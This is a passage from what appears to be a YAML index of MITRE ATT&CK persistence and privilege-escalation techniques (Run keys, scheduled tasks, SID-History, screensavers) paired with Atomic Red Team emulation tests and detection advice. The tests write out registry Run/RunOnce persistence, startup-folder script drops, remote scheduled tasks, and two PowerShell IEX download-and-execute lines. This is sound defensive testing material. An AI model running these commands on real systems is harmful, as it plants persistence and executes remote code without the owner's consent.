- macos - executor: - steps: | - 1. create a custom plist: - - ~/Library/Preferences/com.apple.loginwindow.plist - - or - - ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist - name: manual - - name: Re-Opened Applications - auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb - description: | - Mac Defaults - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - supported_platforms: - - macos - input_arguments: - script: - description: path to script - type: path - default: "/path/to/script" - executor: - command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - -' - cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook - -' - elevation_required: true - name: sh - T1547.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.001 - url: https://attack.mitre.org/techniques/T1547/001 - - external_id: CAPEC-270 - source_name: capec - url: https://capec.mitre.org/data/definitions/270.html - - url: http://msdn.microsoft.com/en-us/library/aa376977 - description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November - 12, 2014. - source_name: Microsoft Run Key - - source_name: Microsoft Wow6432Node 2018 - url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry - description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data - in the Registry. Retrieved August 3, 2020. - - source_name: Malwarebytes Wow6432Node 2016 - url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ - description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved - August 3, 2020. - - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key - description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry - Key. Retrieved June 29, 2018. - source_name: Microsoft RunOnceEx APR 2018 - - url: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden - from Autoruns.exe. Retrieved June 29, 2018. - source_name: Oddvar Moe RunOnceEx Mar 2018 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Registry Run Keys / Startup Folder - description: |- - Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. - - Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. - - The following run keys are created by default on Windows systems: - - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce - - Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) - - The following Registry keys can be used to set startup folder items for persistence: - - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders - - The following Registry keys can control automatic startup of services during boot: - - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices - - Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: - - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run - - The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. - - Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. - - By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. - - Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. - id: attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-08-03T16:30:26.918Z' - created: '2020-01-23T22:02:48.566Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. - - Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Windows Registry - - File monitoring - x_mitre_contributors: - - Oddvar Moe, @oddvarmoe - x_mitre_platforms: - - Windows - identifier: T1547.001 - atomic_tests: - - name: Reg Key Run - auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 - description: "Run Key Persistence\n\nUpon successful execution, cmd.exe will - modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output - will be via stdout. \n" - supported_platforms: - - windows - input_arguments: - command_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.exe - executor: - command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V - "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - -' - cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" - /V "Atomic Red Team" /f >nul 2>&1 - -' - name: command_prompt - - name: Reg Key RunOnce - auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb - description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe - will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will - be via stdout. \n" - supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend - /v 1 /d "#{thing_to_execute}" - -' - cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend - /v 1 /f >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: PowerShell Registry RunOnce - auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 - description: | - RunOnce Key Persistence via PowerShell - Upon successful execution, a new entry will be added to the runonce item in the registry. - supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: powershell.exe - reg_key_path: - description: Path to registry key to update - type: Path - default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce - executor: - command: | - $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' - cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" - -Force -ErrorAction Ignore - -' - name: powershell - elevation_required: true - - name: Suspicious vbs file run from startup Folder - auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 - description: "vbs files can be placed in and ran from the startup folder to - maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will - be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start - Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted - and the user logs in.\n" - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" - Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" - cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" - cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Suspicious jse file run from startup Folder - auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 - description: "jse files can be placed in and ran from the startup folder to - maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will - be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start - Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted - and the user logs in.\n" - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" - Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" - cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" - cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Suspicious bat file run from startup Folder - auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e - description: | - bat files can be placed in and executed from the startup folder to maintain persistance. - Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" - folder and will also run when the computer is restarted and the user logs in. - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" - Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" - Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" - Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Add Executable Shortcut Link to User Startup Folder - auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d - description: 'Adds a non-malicious executable shortcut link to the current users - startup directory. Test can be verified by going to the users startup directory - and checking if the shortcut link exists. ' - supported_platforms: - - windows - executor: - command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation - = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell - = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath - = $Target\n$Create.Save() " - cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start - Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore - name: powershell - elevation_required: true - T1134.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1134.005 - url: https://attack.mitre.org/techniques/T1134/005 - - url: https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx - description: Microsoft. (n.d.). Security Identifiers. Retrieved November 30, - 2017. - source_name: Microsoft SID - - url: https://msdn.microsoft.com/library/ms679833.aspx - description: Microsoft. (n.d.). Active Directory Schema - SID-History attribute. - Retrieved November 30, 2017. - source_name: Microsoft SID-History Attribute - - url: https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems - description: Microsoft. (2017, June 23). Well-known security identifiers in - Windows operating systems. Retrieved November 30, 2017. - source_name: Microsoft Well Known SIDs Jun 2017 - - url: https://technet.microsoft.com/library/ee617241.aspx - description: Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved - November 30, 2017. - source_name: Microsoft Get-ADUser - - url: https://adsecurity.org/?p=1772 - description: 'Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence - #14: SID History. Retrieved November 30, 2017.' - source_name: AdSecurity SID History Sept 2015 - - url: https://msdn.microsoft.com/library/ms677982.aspx - description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November - 30, 2017. - source_name: Microsoft DsAddSidHistory - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: SID-History Injection - description: |- - Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). - - With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028). - id: attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-26T21:49:31.964Z' - created: '2020-02-18T18:34:49.414Z' - x_mitre_contributors: - - Alain Homewood, Insomnia Security - - Vincent Le Toux - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory) - - Monitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory) - x_mitre_data_sources: - - Windows event logs - - Authentication logs - - API monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1053.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.005 - url: https://attack.mitre.org/techniques/T1053/005 - - url: https://twitter.com/leoloobeek/status/939248813465853953 - description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved - December 12, 2017. - source_name: Twitter Leoloobeek Scheduled Task - - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen - description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention - settings. Retrieved December 12, 2017. - source_name: TechNet Forum Scheduled Task Operational Setting - - url: https://technet.microsoft.com/library/dd315590.aspx - description: Microsoft. (n.d.). General Task Registration. Retrieved December - 12, 2017. - source_name: TechNet Scheduled Task Events - - source_name: Microsoft Scheduled Task Events Win10 - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events - description: Microsoft. (2017, May 28). Audit Other Object Access Events. - Retrieved June 27, 2019. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Task - description: |- - Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. - - The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. - - An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). - id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:45:03.730Z' - created: '2019-11-27T14:58:00.429Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. - - Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) - - * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered - * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated - * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted - * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created - * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled - * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) - - Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs - x_mitre_platforms: - - Windows - identifier: T1053.005 - atomic_tests: - - name: Scheduled Task Startup Script - auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 - description: | - Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view - the tasks, open the Task Scheduler and look in the Active Tasks pane. - supported_platforms: - - windows - executor: - command: | - schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" - schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" - cleanup_command: | - schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 - schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1 - name: command_prompt - elevation_required: true - - name: Scheduled task Local - auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 - description: 'Upon successful execution, cmd.exe will create a scheduled task - to spawn cmd.exe at 20:10. - -' - supported_platforms: - - windows - input_arguments: - task_command: - description: What you want to execute - type: String - default: C:\windows\system32\cmd.exe - time: - description: What time 24 Hour - type: String - default: 72600 - executor: - name: command_prompt - elevation_required: false - command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - -' - cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - -' - - name: Scheduled task Remote - auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd - description: | - Create a task on a remote system. - - Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. - supported_platforms: - - windows - input_arguments: - task_command: - description: What you want to execute - type: String - default: C:\windows\system32\cmd.exe - time: - description: What time 24 Hour - type: String - default: 72600 - target: - description: Target - type: String - default: localhost - user_name: - description: 'Username to authenticate with, format: DOMAIN\User' - type: String - default: DOMAIN\user - password: - description: Password to authenticate with - type: String - default: At0micStrong - executor: - name: command_prompt - elevation_required: true - command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN - "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - -' - cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} - /TN "Atomic task" /F >nul 2>&1 - -' - - name: Powershell Cmdlet Scheduled Task - auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd - description: | - Create an atomic scheduled task that leverages native powershell cmdlets. - - Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. - supported_platforms: - - windows - executor: - name: powershell - elevation_required: false - command: | - $Action = New-ScheduledTaskAction -Execute "calc.exe" - $Trigger = New-ScheduledTaskTrigger -AtLogon - $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest - $Set = New-ScheduledTaskSettingsSet - $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set - Register-ScheduledTask AtomicTask -InputObject $object - cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false - >$null 2>&1 - -' - - name: Task Scheduler via VBA - auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 - description: | - This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within - 30 - 40 seconds after this module has run - supported_platforms: - - windows - input_arguments: - ms_product: - description: Maldoc application Word - type: String - default: Word - dependency_executor_name: powershell - dependencies: - - description: 'Microsoft #{ms_product} must be installed - -' - prereq_command: | - try { - New-Object -COMObject "#{ms_product}.Application" | Out-Null - $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} - Stop-Process -Name $process - exit 0 - } catch { exit 1 } - get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} - manually to meet this requirement" - -' - executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" - -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" - -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" - name: powershell - - name: WMI Invoke-CimMethod Scheduled Task - auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b - description: 'Create an scheduled task that executes notepad.exe after user - login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing - as Register-ScheduledTask cmdlet behind the scenes. - -' - supported_platforms: - - windows - executor: - name: powershell - elevation_required: true - command: | - $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") - Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } - cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false - >$null 2>&1 - -' - T1053: - technique: - created: '2017-05-31T21:30:46.977Z' - modified: '2020-10-14T15:20:01.069Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Task/Job - description: |- - Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) - - Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). - external_references: - - source_name: mitre-attack - external_id: T1053 - url: https://attack.mitre.org/techniques/T1053 - - external_id: CAPEC-557 - source_name: capec - url: https://capec.mitre.org/data/definitions/557.html - - url: https://technet.microsoft.com/en-us/library/cc785125.aspx - description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved - June 8, 2016. - source_name: TechNet Task Scheduler Security - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_platforms: - - Windows - - Linux - - macOS - x_mitre_remote_support: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement." - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs - x_mitre_contributors: - - Prashant Verma, Paladion - - Leo Loobeek, @leoloobeek - - Travis Smith, Tripwire - - Alain Homewood, Insomnia Security - x_mitre_version: '2.0' - x_mitre_is_subtechnique: false - atomic_tests: [] - T1546.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.002 - url: https://attack.mitre.org/techniques/T1546/002 - - source_name: Wikipedia Screensaver - description: Wikipedia. (2017, November 22). Screensaver. Retrieved December - 5, 2017. - url: https://en.wikipedia.org/wiki/Screensaver - - source_name: ESET Gazer Aug 2017 - description: 'ESET. (2017, August). Gazing at Gazer: Turla’s new second stage - backdoor. Retrieved September 14, 2017.' - url: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Screensaver - description: |- - Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. - - The following screensaver settings are stored in the Registry 